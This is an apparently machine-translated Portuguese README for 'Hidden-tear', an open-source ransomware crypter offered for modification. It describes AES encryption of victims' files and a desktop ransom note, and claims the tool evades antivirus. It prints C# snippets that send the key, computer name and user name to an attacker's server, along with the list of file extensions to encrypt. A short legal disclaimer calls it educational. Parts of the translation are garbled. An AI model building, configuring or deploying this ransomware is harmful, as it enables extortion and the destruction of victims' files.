Hidden-tear – Um crypter de arquivo ransomware open source
_ _ _ _ _
| | (_) | | | | | |
| |__ _ __| | __| | ___ _ __ | |_ ___ __ _ _ __
| '_ \| |/ _` |/ _` |/ _ \ '_ \ | __/ _ \/ _` | '__|
| | | | | (_| | (_| | __/ | | | | || __/ (_| | |
|_| |_|_|\__,_|\__,_|\___|_| |_| \__\___|\__,_|_|
É um exemplo de crypter de arquivo semelhante ao ransomware que pode ser modificado para propósitos específicos.
Características
- Usa o algoritmo AES para criptografar arquivos.
- Envia a chave de criptografia para um servidor.
- Arquivos criptografados podem ser descriptografados no programa decrypter com chave de criptografia.
- Cria um arquivo de texto na área de trabalho com uma determinada mensagem.
- Tamanho pequeno do arquivo (12 KB)
- Não detectado para programas antivírus (15/08/2015) http://nodistribute.com/result/6a4jDwi83Fzt
Vídeo de demonstrativo
Uso
- Você precisa ter um servidor web que suporte linguagens de script como php, python etc. Altere esta linha com seu URL. (É melhor você usar a conexão Https para evitar a espionagem)
string targetURL = "https://www.example.com/hidden-tear/write.php?info="; - O script deve gravar o parâmetro GET em um arquivo de texto. Processo de envio em execução na
SendPassword()funçãostring info = computerName + "-" + userName + " " + password; var fullUrl = targetURL + info; var conent = new System.Net.WebClient().DownloadString(fullUrl); - As extensões de arquivo de destino podem ser alteradas. Lista padrão:
var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};
Aviso Legal
Embora isso possa ser útil para alguns, existem riscos significativos. A lágrima oculta pode ser usada apenas para fins educacionais. Não o use como um ransomware! Você poderia ir para a prisão por obstrução de acusações de justiça apenas por correr lágrimas ocultas, mesmo que você seja inocente.